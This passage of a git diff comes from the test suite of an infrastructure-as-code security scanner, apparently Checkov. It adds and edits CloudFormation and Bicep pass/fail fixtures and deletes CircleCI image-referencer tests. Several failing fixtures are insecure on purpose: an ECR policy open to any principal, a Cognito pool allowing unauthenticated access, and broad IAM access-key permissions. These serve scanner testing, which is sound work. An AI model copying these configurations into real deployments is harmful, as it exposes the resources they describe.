+resource sql_auditing_pass 'Microsoft.Sql/servers/auditingSettings@2023-05-01-preview' = {
+  name: 'default'
+  parent: sqlServer_pass
+  properties: {
+    isAzureMonitorTargetEnabled: true
+    retentionDays: 92
+    state: 'Enabled'
+  }
+}
diff --git a/tests/bicep/graph/checks/test_yaml_policies.py b/tests/bicep/graph/checks/test_yaml_policies.py
index 2d233683123..8824b5ec52b 100644
--- a/tests/bicep/graph/checks/test_yaml_policies.py
+++ b/tests/bicep/graph/checks/test_yaml_policies.py
@@ -36,6 +36,9 @@ def setUp(self) -> None:
     def test_SQLServerAuditingEnabled(self):
         self.go("SQLServerAuditingEnabled")
 
+    def test_SQLServerAuditingRetention90Days(self):
+        self.go("SQLServerAuditingRetention90Days")
+
     def test_registry_load(self):
         registry = self.get_checks_registry()
         self.assertGreater(len(registry.checks), 0)
diff --git a/tests/circleci_pipelines/image_referencer/conftest.py b/tests/circleci_pipelines/image_referencer/conftest.py
deleted file mode 100644
index e0fed1f5cd8..00000000000
--- a/tests/circleci_pipelines/image_referencer/conftest.py
+++ /dev/null
@@ -1,260 +0,0 @@
-from __future__ import annotations
-import pytest
-
-from checkov.common.images.image_referencer import Image
-
-
-@pytest.fixture
-def file_path() -> str:
-	return ".circleci/config.yml"
-
-
-@pytest.fixture
-def circleci_config_with_images_definitions(file_path) -> dict:
-	return {
-		file_path: {
-			"orbs": {
-				"new-orb": "whatever/orbname@goodorb",
-				"some-orb": "orbs/orbname@dev:blah",
-				"__startline__": 6,
-				"__endline__": 9
-			},
-			"executors": {
-				"default-executor": {
-					"machine": {
-						"image": "windows-server-2022",
-						"__startline__": 12,
-						"__endline__": 14
-					},
-					"__startline__": 11,
-					"__endline__": 14
-				},
-				"image-executor": {
-					"docker": {
-						"image": "mongo:2.6.8",
-						"__startline__": 16,
-						"__endline__": 18
-					},
-					"__startline__": 15,
-					"__endline__": 18
-				},
-				"__startline__": 10,
-				"__endline__": 18
-			},
-			"jobs": {
-				"test-docker-versioned-img": {
-					"docker": [
-						{
-							"image": "mongo:2.6.8",
-							"__startline__": 21,
-							"__endline__": 22
-						}
-					],
-					"steps": [
-						"some-step"
-					],
-					"__startline__": 20,
-					"__endline__": 25
-				},
-				"__startline__": 19,
-				"__endline__": 25
-			},
-			"__startline__": 5,
-			"__endline__": 25
-		}
-	}
-
-
-@pytest.fixture
-def circle_ci_filepath_workflow_with_images_config(circleci_config_with_images_definitions, file_path) \
-		-> tuple[str, dict]:
-	return file_path, circleci_config_with_images_definitions.get(file_path)
-
-
-@pytest.fixture
-def circleci_config_no_images_definitions(file_path) -> dict:
-	return {
-		file_path: {
-			"orbs": {
-				"new-orb": "whatever/orbname@goodorb",
-				"some-orb": "orbs/orbname@dev:blah",
-				"__startline__": 6,
-				"__endline__": 9
-			},
-			"executors": {
-				"default-executor": {
-					"machine": {
-						"image": "windows-server-2022",
-						"__startline__": 12,
-						"__endline__": 14
-					},
-					"__startline__": 11,
-					"__endline__": 14
-				},
-				"__startline__": 10,
-				"__endline__": 14
-			},
-			"jobs": {
-				"test-macos-image": {
-					"macos": {
-						"xcode": "9.4.1",
-						"__startline__": 17,
-						"__endline__": 18
-					},
-					"steps": [
-						"some-step"
-					],
-					"__startline__": 16,
-					"__endline__": 21
-				},
-				"test-machine-default": {
-					"executor": {
-						"name": "win/default-executor",
-						"__startline__": 23,
-						"__endline__": 24
-					},
-					"steps": [
-						"some-step"
-					],
-					"__startline__": 22,
-					"__endline__": 27
-				},
-				"__startline__": 15,
-				"__endline__": 27
-			},
-			"__startline__": 5,
-			"__endline__": 27
-		}
-	}
-
-
-@pytest.fixture
-def circle_ci_filepath_workflow_no_images_config(circleci_config_no_images_definitions, file_path) -> tuple[str, dict]:
-	return file_path, circleci_config_no_images_definitions.get(file_path)
-
-
-@pytest.fixture
-def circle_ci_image1(file_path) -> Image:
-	image = Image(
-		end_line=18,
-		start_line=16,
-		name='mongo:2.6.8',
-		file_path=file_path,
-		related_resource_id='executors(image-executor).docker.image[1](mongo:2.6.8)',
-	)
-	return image
-
-
-@pytest.fixture
-def circle_ci_image2(file_path) -> Image:
-	image = Image(
-		end_line=22,
-		start_line=21,
-		name='mongo:2.6.8',
-		file_path=file_path,
-		related_resource_id='jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)',
-	)
-	return image
-
-
-@pytest.fixture
-def image_cached_result() -> dict:
-	return {
-		"results": [
-			{
-				"id": "sha256:9dbc24674f25eb449df11179ed3717c47348fb3aa985ae14b3936d54c2c09dde",
-				"name": "postgres:14.2",
-				"distro": "Debian GNU/Linux 11 (bullseye)",
-				"distroRelease": "bullseye",
-				"digest": "sha256:2c954f8c5d03da58f8b82645b783b56c1135df17e650b186b296fa1bb71f9cfd",
-				"collections": [
-					"All"
-				],
-				"packages": [
-					{
-						"type": "os",
-						"name": "base-files",
-						"version": "11.1+deb11u3",
-						"licenses": [
-							"GPL"
-						]
-					}
-				],
-				"compliances": [],
-				"complianceDistribution": {
-					"critical": 0,
-					"high": 2,
-					"medium": 0,
-					"low": 0,
-					"total": 2
-				},
-				"complianceScanPassed": True,
-				"vulnerabilities": [
-				],
-				"vulnerabilityDistribution": {
-					"critical": 9,
-					"high": 26,
-					"medium": 8,
-					"low": 17,
-					"total": 60
-				},
-				"vulnerabilityScanPassed": True
-			}
-		]
-	}
-
-
-@pytest.fixture
-def image_cached_results_for_report() -> tuple:
-	return (
-		{
-			'image_name': 'redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673',
-			'related_resource_id': 'jobs(test-docker-hash-img).docker.image[1](redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'buildpack-deps:latest',
-			'related_resource_id': 'jobs(test-docker-latest-img).docker.image[1](buildpack-deps:latest)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'mongo:2.6.8',
-			'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'postgres:14.2',
-			'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[2](postgres:14.2)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'cimg/python:latest',
-			'related_resource_id': 'jobs(test-echo).docker.image[1](cimg/python:latest)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'cimg/python:latest',
-			'related_resource_id': 'jobs(test-inject).docker.image[1](cimg/python:latest)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'cimg/python:latest',
-			'related_resource_id': 'jobs(test-inject2).docker.image[1](cimg/python:latest)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'cimg/python:latest',
-			'related_resource_id': 'jobs(test-curl-secret).docker.image[1](cimg/python:latest)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'cimg/python:latest',
-			'related_resource_id': 'jobs(test-inject-ci-vars).docker.image[1](cimg/python:latest)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		},
-		{
-			'image_name': 'mongo:2.6.8',
-			'related_resource_id': 'executors(image-executor).docker.image[1](mongo:2.6.8)',
-			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
-		}
-	)
diff --git a/tests/circleci_pipelines/image_referencer/test_manager.py b/tests/circleci_pipelines/image_referencer/test_manager.py
deleted file mode 100644
index 92ab28b87e6..00000000000
--- a/tests/circleci_pipelines/image_referencer/test_manager.py
+++ /dev/null
@@ -1,43 +0,0 @@
-from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager
-
-
-def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config,
-                                      circle_ci_image1, circle_ci_image2):
-    file_path, config = circle_ci_filepath_workflow_with_images_config
-
-    manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config)
-    images = manager.extract_images_from_workflow()
-
-    assert set(images) == {circle_ci_image1, circle_ci_image2}
-
-
-def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config):
-    file_path, config = circle_ci_filepath_workflow_no_images_config
-
-    manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config)
-    images = manager.extract_images_from_workflow()
-
-    assert not images
-
-def test_extract_images_from_workflow_nested(circle_ci_filepath_workflow_no_images_config):
-    file_path = '/tmp/test_path'
-    config = {
-        'workspace_root': '/go/src/github.com/gruntwork-io/terragrunt',
-        'defaults': {
-            'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [
-                {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11',
-                    '__startline__': 6, '__endline__': 8}], '__startline__': 3, '__endline__': 8
-        },
-        'jobs': {
-            'install_dependencies': {
-                'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [
-                {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11',
-                 '__startline__': 6, '__endline__': 8}], 'steps': ['checkout'], '__startline__': 11, '__endline__': 32
-            }
-        }, '__startline__': 1, '__endline__': 143
-    }
-
-    manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config)
-    images = manager.extract_images_from_workflow()
-
-    assert not images
diff --git a/tests/circleci_pipelines/image_referencer/test_provider.py b/tests/circleci_pipelines/image_referencer/test_provider.py
deleted file mode 100644
index 4f342a9000b..00000000000
--- a/tests/circleci_pipelines/image_referencer/test_provider.py
+++ /dev/null
@@ -1,55 +0,0 @@
-import pytest
-
-from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider
-from checkov.circleci_pipelines.runner import Runner
-
-
-def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config,
-                                      circle_ci_image1, circle_ci_image2):
-    file_path, config = circle_ci_filepath_workflow_with_images_config
-
-    provider = CircleCIProvider(file_path=file_path, workflow_config=config)
-    images = provider.extract_images_from_workflow()
-
-    assert set(images) == {circle_ci_image1, circle_ci_image2}
-
-
-def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config):
-    file_path, config = circle_ci_filepath_workflow_no_images_config
-
-    provider = CircleCIProvider(file_path=file_path, workflow_config=config)
-    images = provider.extract_images_from_workflow()
-
-    assert not images
-
-@pytest.mark.parametrize(
-    "start_line, end_line, tag, supported_entities, old_key_format, expected_key",
-    [
-        (21,
-         22,
-         'jobs',
-         ('jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',),
-         'jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_1[85:86]',
-         "jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)"),
-        (16,
-         18,
-         'executors',
-         ('executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',),
-         'executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_8[16:18]',
-         "executors(image-executor).docker.image[1](mongo:2.6.8)")
-    ]
-)
-def test_generate_resource_key_generates_same_key_as_get_resource(file_path,
-                                                                  start_line, end_line, tag,
-                                                                  supported_entities,
-                                                                  old_key_format, expected_key,
-                                                                  circleci_config_with_images_definitions):
-    definitions = circleci_config_with_images_definitions.get(file_path)
-    provider = CircleCIProvider(definitions, file_path)
-    runner = Runner()
-    runner.definitions[file_path] = definitions
-
-    key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line)
-    key2 = provider.generate_resource_key(start_line, end_line, tag)
-
-    assert key1 == key2 == expected_key
diff --git a/tests/circleci_pipelines/image_referencer/test_runner.py b/tests/circleci_pipelines/image_referencer/test_runner.py
deleted file mode 100644
index 5b921f19e5a..00000000000
--- a/tests/circleci_pipelines/image_referencer/test_runner.py
+++ /dev/null
@@ -1,68 +0,0 @@
-from pathlib import Path
-
-from checkov.circleci_pipelines.runner import Runner
-from checkov.common.bridgecrew.bc_source import get_source_type
-from checkov.common.bridgecrew.check_type import CheckType
-
-from checkov.runner_filter import RunnerFilter
-from pytest_mock import MockerFixture
-
-from tests.common.image_referencer.test_utils import mock_get_empty_license_statuses_async, \
-    mock_get_image_cached_result_async
-
-RESOURCES_PATH = Path(__file__).parent.parent / "resources"
-
-
-def test_circleCI_workflow(mocker: MockerFixture, file_path, image_cached_results_for_report):
-    from checkov.common.bridgecrew.platform_integration import bc_integration
-    test_file = RESOURCES_PATH / file_path
-
-    runner_filter = RunnerFilter(run_image_referencer=True)
-    bc_integration.bc_source = get_source_type("disabled")
-
-    mocker.patch(
-        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
-        side_effect=mock_get_image_cached_result_async,
-    )
-    mocker.patch(
-        "checkov.common.images.image_referencer.get_license_statuses_async",
-        side_effect=mock_get_empty_license_statuses_async,
-    )
-
-    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
-
-    assert len(reports) == 2
-
-    circleci_report = next(report for report in reports if report.check_type == CheckType.CIRCLECI_PIPELINES)
-    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
-
-    assert len(circleci_report.resources) == 0
-    assert len(circleci_report.passed_checks) == 32
-    assert len(circleci_report.failed_checks) == 13
-    assert len(circleci_report.skipped_checks) == 0
-    assert len(circleci_report.parsing_errors) == 0
-
-    assert len(sca_image_report.extra_resources) == 10
-    assert len(sca_image_report.image_cached_results) == 10
-
-    got_images = ({
-                'image_name': image['dockerImageName'],
-                'related_resource_id': image['relatedResourceId'],
-                'packages': image['packages']
-                 } for image in sca_image_report.image_cached_results)
-    for image in got_images:
-        assert image in image_cached_results_for_report
-    assert len(sca_image_report.extra_resources) == 10
-    assert len(sca_image_report.image_cached_results) == 10
-
-
-def test_runner_image_check(file_path):
-    test_file = RESOURCES_PATH / file_path
-    runner_filter = RunnerFilter(framework=['circleci_pipelines'], checks=['CKV_CIRCLECIPIPELINES_8'])
-
-    report = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
-
-    assert len(report.failed_checks) == 0
-    assert report.parsing_errors == []
-    assert len(report.passed_checks) == 12
-    assert report.skipped_checks ==[]
diff --git a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml
index afab03f3d83..855dfc01dad 100644
--- a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml
+++ b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml
@@ -7,8 +7,12 @@ Resources:
       PolicyName: IAMUpdateAccessKeyPolicy
       PolicyDocument:
         Statement:
-          - Action: 'iam:UpdateAccessKey'
-            Effect: Allow
+          - Effect: Allow
+            Action:
+            - 'iam:UpdateAccessKey'
+            - 'iam:UntagRole'
+            - 'iam:CreateAccessKey'
+            - 'iam:TagPolicy'
             Resource: '*'
       Roles:
         - example_role
diff --git a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml
index 2f7f43783b9..ed97da1ff9a 100644
--- a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml
+++ b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml
@@ -3,6 +3,11 @@ Description: IAM policy
 Resources:
   NotPermissionsScoped:
     Type: 'AWS::IAM::Policy'
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3510
     Properties:
       PolicyName: root
       PolicyDocument:
@@ -12,7 +17,7 @@ Resources:
             Action: 
             - 's3:Get*'
             Resource: 
-            - 'foo'
+            - 'foobar'
       Roles:
         - example_role
   NotPermissionsWildcard:
@@ -43,6 +48,11 @@ Resources:
         - example_role
   PermissionsScoped:
     Type: 'AWS::IAM::Policy'
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3510
     Properties:
       PolicyName: root
       PolicyDocument:
diff --git a/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml b/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml
index a124927c875..301391cff7b 100644
--- a/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml
+++ b/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml
@@ -3,6 +3,11 @@ Description: IAM policy
 Resources:
   NotPermissionsScoped:
     Type: 'AWS::IAM::ManagedPolicy'
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3510
     Properties:
       ManagedPolicyName: root
       PolicyDocument:
@@ -43,6 +48,11 @@ Resources:
         - example_role
   PermissionsScoped:
     Type: 'AWS::IAM::ManagedPolicy'
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3510
     Properties:
       ManagedPolicyName: root
       PolicyDocument:
diff --git a/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml
index ea98afa8533..5b8224cc663 100644
--- a/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml
+++ b/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml
@@ -1,7 +1,12 @@
 Resources:
   Aurora0:
     Type: 'AWS::RDS::DBCluster'
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3690
     Properties:
-      DatabaseName: 'mydb'
+      DatabaseName: 'mydb2'
       Engine: 'aurora'
       StorageEncrypted: true
diff --git a/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/FAIL.yaml
new file mode 100644
index 00000000000..a9c2eb6a58d
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/FAIL.yaml
@@ -0,0 +1,6 @@
+AWSTemplateFormatVersion: "2010-09-09"
+Resources:
+  Fail:
+    Type: AWS::Bedrock::Agent
+    Properties:
+      AgentName: test
diff --git a/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/PASS.yaml b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/PASS.yaml
new file mode 100644
index 00000000000..e4dd99c02d9
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/PASS.yaml
@@ -0,0 +1,7 @@
+AWSTemplateFormatVersion: "2010-09-09"
+Resources:
+  Pass:
+    Type: AWS::Bedrock::Agent
+    Properties:
+      AgentName: test
+      CustomerEncryptionKeyArn: arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab
diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml
new file mode 100644
index 00000000000..8a5d5e8d9a8
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml
@@ -0,0 +1,8 @@
+AWSTemplateFormatVersion: 2010-09-09
+Description: Identity pool
+Resources:
+  Fail:
+    Type: AWS::Cognito::IdentityPool
+    Properties:
+      AllowClassicFlow: True
+      AllowUnauthenticatedIdentities: True
diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml
new file mode 100644
index 00000000000..b1fd73c9445
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml
@@ -0,0 +1,8 @@
+AWSTemplateFormatVersion: 2010-09-09
+Description: Identity pool
+Resources:
+  Pass:
+    Type: AWS::Cognito::IdentityPool
+    Properties:
+      AllowClassicFlow: True
+      AllowUnauthenticatedIdentities: False
diff --git a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml
index f545330e862..5e4fd401443 100644
--- a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml
+++ b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml
@@ -16,6 +16,7 @@ Resources:
         config:
           ignore_checks:
             - E2531
+            - E2533
     Properties:
       Handler: 'index.handler'
       Role: 'arn:aws:iam::123456789012:role/execution_role'
diff --git a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml
index 2ff19fbb789..c95da236954 100644
--- a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml
+++ b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml
@@ -11,6 +11,7 @@ Resources:
         config:
           ignore_checks:
             - E2531
+            - E2533
     Properties:
       Handler: 'index.handler'
       Runtime: 'python3.6'
diff --git a/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml
index 6bac4483f69..e29d6cbc8eb 100644
--- a/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml
+++ b/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml
@@ -1,21 +1,20 @@
 AWSTemplateFormatVersion: "2010-09-09"
-Resources: 
+Resources:
   Public:
     Type: AWS::ECR::Repository
-    Properties: 
+    Properties:
       RepositoryName: "test-repository"
-      RepositoryPolicyText: 
+      RepositoryPolicyText:
         Version: "2012-10-17"
-        Statement: 
-          - 
-            Sid: AllowPushPull
+        Statement:
+          - Sid: AllowPushPull
             Effect: Allow
-            Principal: "*"
-            #Principal: 
-            #   AWS: 
-            #     - "arn:aws:iam::123456789012:user/Bob"
-            #     - "arn:aws:iam::123456789012:user/Alice"
-            Action: 
+            Principal:
+               AWS:
+                 - "arn:aws:iam::123456789012:user/Bob"
+                 - "arn:aws:iam::123456789012:user/Alice"
+                 - "*"
+            Action:
               - "ecr:GetDownloadUrlForLayer"
               - "ecr:BatchGetImage"
               - "ecr:BatchCheckLayerAvailability"
diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml
index 848a622d6db..d946d9b07f9 100644
--- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml
+++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml
@@ -110,7 +110,7 @@ Resources:
       SubnetIds:
         - !Ref SubnetA
         - !Ref SubnetB
-  ReplicationGroup:
+  ReplicationGroupFail:
     Type: 'AWS::ElastiCache::ReplicationGroup'
     Properties:
       AutomaticFailoverEnabled: !Ref MultiAZSupport
@@ -131,16 +131,3 @@ Resources:
       SnapshotWindow: !Ref SnapshotWindow
       #TransitEncryptionEnabled: False
       TransitEncryptionEnabled: True
-Outputs:
-  RGEndpoint:
-    Description: The primary endpoint location
-    Value: !Join 
-      - ''
-      - - 'redis://'
-        - !GetAtt 
-          - ReplicationGroup
-          - PrimaryEndPoint.Address
-        - ':'
-        - !GetAtt 
-          - ReplicationGroup
-          - PrimaryEndPoint.Port
diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml
new file mode 100644
index 00000000000..be814c09922
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml
@@ -0,0 +1,135 @@
+AWSTemplateFormatVersion: 2010-09-09
+Description: >-
+  An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group.
+Parameters:
+  CacheNodeType:
+    Description: The instance type the nodes will launch under.
+    Type: String
+    Default: cache.m3.medium
+    AllowedValues:
+      - cache.t2.micro
+      - cache.t2.small
+      - cache.t2.medium
+      - cache.m3.medium
+      - cache.m3.large
+      - cache.m3.xlarge
+      - cache.m3.2xlarge
+      - cache.r3.large
+      - cache.r3.xlarge
+      - cache.r3.2xlarge
+      - cache.r3.4xlarge
+      - cache.r3.8xlarge
+  MultiAZSupport:
+    Description: >-
+      Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a
+      read-only replica is automatically promoted to a read-write primary
+      cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property.
+    Type: String
+    Default: 'true'
+    AllowedValues:
+      - 'true'
+      - 'false'
+  NumCacheClusters:
+    Description: >-
+      The number of cache clusters for this replication group. If MultiAZ
+      support is enabled, you must specify a value greater than 1.
+    Default: '2'
+    Type: Number
+    MinValue: '1'
+    MaxValue: '6'
+  RedisPort:
+    Description: >-
+      The port number on which each member of the replication group accepts
+      connections.
+    Type: Number
+    Default: '6379'
+    MinValue: '1'
+    MaxValue: '65535'
+  ReplicationGroupDescription:
+    Description: The description of the replication group.
+    Type: String
+    Default: Example replication group
+  VpcId:
+    Description: The VPC to create this ReplicationGroup under
+    Type: 'AWS::EC2::VPC::Id'
+  CidrIp:
+    Description: The CIDR you want to access to the Replication Group
+    Type: String
+    Default: 0.0.0.0/0
+    AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})'
+    MinLength: '9'
+    MaxLength: '18'
+    ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x
+  SnapshotRetentionLimit:
+    Description: >-
+      The number of days that ElastiCache retains automatic snapshots before
+      deleting them.
+    Type: Number
+    Default: '7'
+  SnapshotWindow:
+    Description: >-
+      The time range (in UTC) when ElastiCache takes a daily snapshot of your node group.
+    Type: String
+    Default: '05:00-09:00'
+    AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}'
+    ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00'
+  PreferredMaintenanceWindow:
+    Description: >-
+      The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC).
+    Type: String
+    Default: 'sun:22:00-sun:23:30'
+    AllowedPattern: >-
+      (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}
+    ConstraintDescription: >-
+      must be a valid timestamp range with day of week, for example
+      sun:22:00-sun:23:30
+  SubnetA:
+    Description: >-
+      One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets
+    Type: 'AWS::EC2::Subnet::Id'
+  SubnetB:
+    Description: >-
+      One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets
+    Type: 'AWS::EC2::Subnet::Id'
+Resources:
+  SecurityGroup:
+    Type: 'AWS::EC2::SecurityGroup'
+    Properties:
+      GroupDescription: Security Group for Example Replication Group
+      SecurityGroupIngress:
+        - Description: Redis Traffic
+          CidrIp: !Ref CidrIp
+          FromPort: !Ref RedisPort
+          ToPort: !Ref RedisPort
+          IpProtocol: tcp
+      VpcId: !Ref VpcId
+  SubnetGroup:
+    Type: 'AWS::ElastiCache::SubnetGroup'
+    Properties:
+      Description: Subnet Group for Example Replication Group
+      SubnetIds:
+        - !Ref SubnetA
+        - !Ref SubnetB
+  ReplicationGroupFail2:
+    Type: 'AWS::ElastiCache::ReplicationGroup'
+    Properties:
+      AutomaticFailoverEnabled: !Ref MultiAZSupport
+      AtRestEncryptionEnabled: True
+      #AtRestEncryptionEnabled: False	# Optional parameter
+      CacheNodeType: !Ref CacheNodeType
+      CacheSubnetGroupName: !Ref SubnetGroup
